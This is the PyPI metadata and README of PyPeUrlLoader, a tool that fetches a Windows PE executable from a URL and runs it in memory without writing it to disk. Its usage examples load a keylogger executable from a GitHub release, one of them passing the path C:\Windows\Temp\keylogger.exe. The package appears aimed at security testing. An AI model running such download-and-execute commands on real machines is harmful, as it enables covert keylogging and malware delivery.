Metadata-Version: 2.2
Name: PyPeUrlLoader
Version: 1.0.0
Summary: This package uses PyPeLoader to load a PE program from a HTTP server (from an URL).
Home-page: https://github.com/mauricelambert/PyPeUrlLoader
Download-URL: https://mauricelambert.github.io/info/python/security/PyPeUrlLoader.pyz
Author: Maurice Lambert
Author-email: Maurice Lambert <mauricelambert434@gmail.com>
Maintainer: Maurice Lambert
Maintainer-email: Maurice Lambert <mauricelambert434@gmail.com>
License: GPL-3.0 License
Project-URL: Github, https://github.com/mauricelambert/PyPeUrlLoader
Project-URL: Documentation, https://mauricelambert.github.io/info/python/security/PyPeUrlLoader.html
Project-URL: Python Executable, https://mauricelambert.github.io/info/python/security/PyPeUrlLoader.pyz
Project-URL: Windows Executable, https://mauricelambert.github.io/info/python/security/PyPeUrlLoader.exe
Keywords: PeLoader,URL,LoadPeFromUrl,MemoryExecution,Fileless,FilelessExecution,HTTP,LoadPeFromHttp
Platform: Windows
Classifier: Topic :: System
Classifier: Topic :: Security
Classifier: Environment :: Console
Classifier: Topic :: System :: Shells
Classifier: Natural Language :: English
Classifier: Programming Language :: Python
Classifier: Intended Audience :: Developers
Classifier: Topic :: System :: System Shells
Classifier: Programming Language :: Python :: 3.8
Classifier: Operating System :: Microsoft :: Windows
Classifier: Topic :: System :: Systems Administration
Classifier: Development Status :: 5 - Production/Stable
Classifier: Intended Audience :: System Administrators
Classifier: License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)
Requires-Python: >=3.8
Description-Content-Type: text/markdown
License-File: LICENSE.txt
Requires-Dist: PyPeLoader>=1
Dynamic: author
Dynamic: download-url
Dynamic: home-page
Dynamic: maintainer
Dynamic: requires-python

![PyPeUrlLoader Logo](https://mauricelambert.github.io/info/python/security/PyPeUrlLoader_small.png "PyPeUrlLoader logo")

# PyPeUrlLoader

## Description

This package uses PyPeLoader to load a PE program from a HTTP server
(from an URL).

## Requirements

This package require:

 - python3
 - python3 Standard Library

## Installation

### Pip

```bash
python3 -m pip install PyPeUrlLoader
```

### Git

```bash
git clone "https://github.com/mauricelambert/PyPeUrlLoader.git"
cd "PyPeUrlLoader"
python3 -m pip install .
```

### Wget

```bash
wget https://github.com/mauricelambert/PyPeUrlLoader/archive/refs/heads/main.zip
unzip main.zip
cd PyPeUrlLoader-main
python3 -m pip install .
```

### cURL

```bash
curl -O https://github.com/mauricelambert/PyPeUrlLoader/archive/refs/heads/main.zip
unzip main.zip
cd PyPeUrlLoader-main
python3 -m pip install .
```

## Usages

### Command line

```bash
PyPeUrlLoader              # Using CLI package executable
python3 -m PyPeUrlLoader   # Using python module
python3 PyPeUrlLoader.pyz  # Using python executable
PyPeUrlLoader.exe          # Using python Windows executable

PyPeUrlLoader https://github.com/mauricelambert/NimKeylogger/releases/download/v0.0.1/Keylogger.exe keylogger
PyPeUrlLoader https://github.com/mauricelambert/NimKeylogger/releases/download/v0.0.1/Keylogger.exe keylogger C:\Windows\Temp\keylogger.exe
```

## Links

 - [Pypi](https://pypi.org/project/PyPeUrlLoader)
 - [Github](https://github.com/mauricelambert/PyPeUrlLoader)
 - [Documentation](https://mauricelambert.github.io/info/python/security/PyPeUrlLoader.html)
 - [Python executable](https://mauricelambert.github.io/info/python/security/PyPeUrlLoader.pyz)
 - [Python Windows executable](https://mauricelambert.github.io/info/python/security/PyPeUrlLoader.exe)

## License

Licensed under the [GPL, version 3](https://www.gnu.org/licenses/).
